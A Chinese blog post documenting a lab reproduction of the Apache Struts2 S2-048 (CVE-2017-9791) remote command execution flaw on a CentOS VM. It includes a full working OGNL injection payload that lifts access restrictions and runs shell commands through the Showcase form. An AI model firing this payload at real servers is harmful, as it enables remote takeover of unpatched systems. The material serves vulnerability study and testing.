入坑centos笔记(二)

最新推荐文章于 2022-04-21 20:43:47 发布
最新推荐文章于 2022-04-21 20:43:47 发布
阅读量399 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Neu_webin/article/details/78494170
版权

搭建centos服务器环境事实上是为了复现CVE-2017-9791  Struts(S2-048远程命令执行漏洞)

一、   漏洞分析

原理:在Struts2.3.x 系列的Showcase应用中演示Struts2整合Struts1的插件中存在一处任意代码执行漏洞。当应用使用了Struts2 Struts1的插件时,可能导致不受信任的输入传入到ActionMessage类中导致命令执行。

具体分析(以struts2.3.24版本为例):

漏洞触发位置在SaveGangsterAction.java中,

在struts2中开启了struts1的插件,org.apache.struts2.s1.Struts1Action类是把封装了struts1的Action 以便兼容在struts2中。

首先这里ActionForwardforward = action.execute(mapping, actionForm, request, response);会把表单的请求处理回显给客户端。

然后addActionMessage(getText(msg.getKey(),Arrays.asList(msg.getValues())));这里又调用了getText方法会把action messages传递给com.opensymphony.xwork2.util.LocalizedTextUtil.getDefaultMessage。

最后在其中又调用了com.opensymphony.xwork2.util.TextParseUtil.translateVariables,它用来调用OGNL 表达式用处理字符串表达式。漏洞利用OGNL表达式执行任意命令。


二、   实验环境

1.  靶机:centOS 7.3 :https://www.centos.org/download/

2.  攻击机: Windows10 64-bit

 

三、   实验结果

//实验操作的完整步骤

首先搭建实验环境,这里使用的靶机环境为centOS 7.3 64-bit

 

在对应网站下载受影响的struts2版本具体影响范围为struts2.3.*

这里使用了struts2.3.24进行漏洞复现

将struts2-showcase.war放到tomcat/webapps目录下,首先进行本地测试服务是否完好

服务器靶机:curl 127.0.0.1:8080\

发现有response说明服务完好。查询本机ip地址为192.168.36.128

那么在攻击机上进行基本访问

这里UA使用firefox,url:http://192.168.36.128:8080/struts2-showcase/integration/editGangster.action

 

 

验证漏洞:在Gangster Name中提交${1+1}发现最终1+1被执行

说明漏洞存在

于是构造payload:name=${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd="ifconfig").(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}&age=111&__checkbox_bustedBefore=true&description=

其中加粗的地方为可执行的命令

这里面遇到一个坑,调了很久不知道哪里出了问题。。就是我在直接提交payload的时候发现返回name字段不能为空,加一个回车换行就可以,具体在验证脚本中有写到。

Burpsuite抓包修改重放可以看到

成功执行了ifconfig命令

于是写脚本验证,脚本主体如下:

由于需要换行(最后还是不知道为什么)于是在蓝色箭头处手动添加换行符。

 

 

执行脚本

服务器端信息:

至此、漏洞验证过程完毕

Mr_BeanX
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Struts2漏洞利用原理
weixin_33810006的博客
04-12 1万+
概述: Struts2是apache项目下的一个web 框架,目前web框架中非常流行的都是mvc设计模式、经典例子例如:python的Django、Flask;java的ssm等。因为使用MVC设计模式,所以在框架内部处理用户数据流参数的事后就不可避免的存在数据在不同层次流转的问题。struts2作为java的一款成熟的web框架,自然也面临这个问题,于是struts2设计了一套OGNL的模式...
struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞
09-08
2017年7月7日,Apache Struts发布最新的安全公告,Apache Struts2-strus1-plugin插件存在远程代码执行的高危漏洞漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为:2.3.x。 攻击者可以构造恶意的字段值(value)通过Struts2struts2-struts1-plugin的插件传递给被攻击主机,从而实现远程代码执行攻击,直接获取远程主机的控制权限。
S2-048 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-16 658
漏洞背景 Apache的Struts2是一个优雅的,可扩展的开源MVC框架,主要用于创建企业级的Java Web应用程序。在Struts 2.3.X系列的Showcase插件中演示Struts2整合Struts 1的插件中存在一处任意代码执行漏洞。当你的Web应用使用了 Struts 2 Struts 1插件, 则可能导致Struts2执行由外部输入的恶意攻击代码。 漏洞影响 Apache ...
linux-centos学习笔记
TonCC的博客
01-08 927
linux学习笔记一、常用Linux基本命令1.1 基本命令1.2 快捷键 一、常用Linux基本命令 1.1 基本命令 1.2 快捷键 ctrl + shift + = 放大终端窗口的字体 ctrl + - 缩小终端窗口的字体 ...
BurpSuite基本介绍及环境配置
chaojixiaojingang
08-10 6987
BurpSuite简介        Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。 Burp Suite 包含了一系列burp 工具,这些工具之间有大量接口可以互相通信,之所以这样设计的目的是为了促进和...
CentOS笔记
07-29
CentOS的简单命令以及tomcat jdk mysql,部署项目
centos笔记.xmind.zip
01-03
centos学习笔记(思维导图)
centos linux学习笔记
07-18
学习自鸟哥的linux--基础学习篇,都是自己的所学心得
韩顺平2018Linux视频笔记
03-17
韩顺平2018Linux视频笔记,我添加了书签
CentOS6.6 安装 Tengine 笔记
09-30
主要介绍了CentOS6.6 安装 Tengine 笔记,本文讲解了安装必要的编译环境好、安装需要的组件、安装Tengine等步骤,需要的朋友可以参考下
技术分析 | Struts2 S2-048漏洞:跟踪攻击趋势,成功检测防御
weixin_33888907的博客
07-10 429
7月7日,Apache Struts官方发布了漏洞编号为:S2-048的高危漏洞公告。 阿里云安全团队2小时内发布官方安全建议,跟踪S2-048的全球攻击趋势,并对不同漏洞版本进行了对比分析。 目前,阿里云云盾态势感知已支持检测,WAF默认支持防御。 一、影响范围 如果在ApacheStruts 2.3.x系列中启用了struts2-struts1-...
S2-052 漏洞复现
weixin_41082546的博客
10-06 1082
Structs2框架已知的漏洞编号如下: S2-005 S2-009 S2-016 (含S2-013) S2-019 S2-020 S2-021 S2-032 S2-037(含S2-033) DevMode S2-045 S2-046 S2-048 S2-052 S2-055 S2-057 S2-052(CVE-2017-9805)环境: https://gi...
Struts2-048/st2-048/CVE-2017-9791漏洞
weixin_51203422的博客
09-27 724
GitHub - dragoneeg/Struts2-048: CVE-2017-9791 github下载POC python2 Struts048.py http://ip:port/integration/saveGangster.action 使用POC脚本检测, 返回值是 s2-048 EXISTS ! 证明漏洞存在,命令执行成功
s2 安恒 漏洞验证工具_s2-045漏洞批量检测工具
weixin_39713219的博客
12-20 469
今天晚上看老铁们在群里就这个st2-045漏洞讨论得火热,个人不太喜欢日站,本来想直接写个批量挂马的东西,但是想想还是算了,如果你有兴趣,改改也很容易,反正不关我的事测试图2017-3-8更新增加了对.do关键词的支持,并且支持任何关键词了,之前我只考虑到了.action关键词并且写死了规则,py版本已经更新,win版的exe未更新,需要的自行用pyinstaller打包为exe之前采用whoam...
[ 新出漏洞篇 ] 核弹级漏洞 Log4j2 RCE 漏洞爆出,开发圈苦逼,安全圈过年,你赶上了吗 ?(外行都能看懂的漏洞分析)
qq_51577576的博客
12-16 4894
Log4j2相信大家不陌生了~~~哈哈哈哈。 相信大家已经被 Log4j2 的重大漏洞刷屏了。几乎没有互联网公司幸免。 估计有不少开发的小伙伴在此前为了修 bug 已经累趴下了。 估计也有不少安全圈的大佬靠着这个漏洞买房买车了~~~ 你~~~赶上了吗? 每每出现这种重大漏洞,开发岗的大佬们---苦逼,安全岗的大佬们---过年。哈哈哈哈 今天勒,我们就来聊一下 Log4j2 到底是个什么鬼 ? Log4j远程代码执行漏洞详解 中华人民共和国网络安全法 第十七条 任何个人和.
漏洞复现|Struts2版本漏洞复现
weixin_42282189的博客
10-12 818
作者:村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 它全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Str.
渗透测试-Openssl心脏出血漏洞复现
热门推荐
道阻且长,行则将至。
06-21 1万+
Vulhub 简介 Vulhub是一个基于 docker 和 docker-compose 的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。关于Docker技术,读者可通过我另一篇博文进行学习:渗透测试-Docker容器。 Vulhub 的特点: 完全开源,几乎不使用非官方的进制文件、镜像; 百分之95以上的环境是从 docker 基础镜像编译而来,你可以看到每一个环境是怎样建造的; 所有漏洞靶场均包含漏洞原理、参考链接、
struts2反序列化漏洞
cxrpty的博客
03-02 2897
Struts2是一个基于MVC设计模式(java)的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 实验环境:vulhub中的struts 实验步骤: 可利用struts2扫描工具扫描是否有该漏洞,输入python3Struts2Scan.py -u http://192.168.1.103...
S2-061远程代码执行漏洞和fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
weixin_48739941的博客
04-21 2474
1. 复现S2-061远程代码执行漏洞 (1) cd vulhub/struts2/s2-061 切换目录。 (2) docker-compose up -d 启动。 (3) http://192.168.80.161:8080/ (4)执行命令: http://192.168.80.161:8080/?id=%25{(%27Powered_by_Unicode_Potats0%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application[%27or
linux和centos笔记
最新发布
07-27
Linux是一种开源的操作系统内核,而CentOS则是一种基于Linux内核的发行版。下面是关于Linux和CentOS的一些笔记: 1. Linux操作系统: - Linux是一种开源操作系统内核,最初由Linus Torvalds于1991年创建。 - Linux操作系统具有高度的可定制性和灵活性,适用于各种设备,包括个人电脑、服务器、嵌入式系统等。 - Linux支持多用户、多任务和多线程,并提供了丰富的命令行工具和图形界面。 - 常见的Linux发行版包括Ubuntu、Debian、Fedora、CentOS等。 2. CentOS发行版: - CentOS是一种基于Red Hat Enterprise Linux(RHEL)源代码构建的免费发行版。 - CentOS提供了稳定、可靠且安全的操作系统环境,适用于服务器和企业级应用。 - CentOS与RHEL在软件包和功能方面基本保持一致,但不包含商业支持。 - CentOS使用yum作为软件包管理工具,可以方便地安装、更新和卸载软件包。 3. 常用命令和配置: - 在Linux和CentOS中,常用的命令有ls(列出文件和目录)、cd(切换目录)、mkdir(创建目录)、rm(删除文件或目录)等。 - 配置文件通常存放在/etc目录下,例如/etc/network/interfaces用于配置网络接口。 - Linux和CentOS支持使用vi或nano等文本编辑器来编辑配置文件。 - 通过使用sudo命令,可以以超级用户权限执行特权操作。 这些是关于Linux和CentOS的一些基本笔记。如果你有更具体的问题,我可以为你提供更详细的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值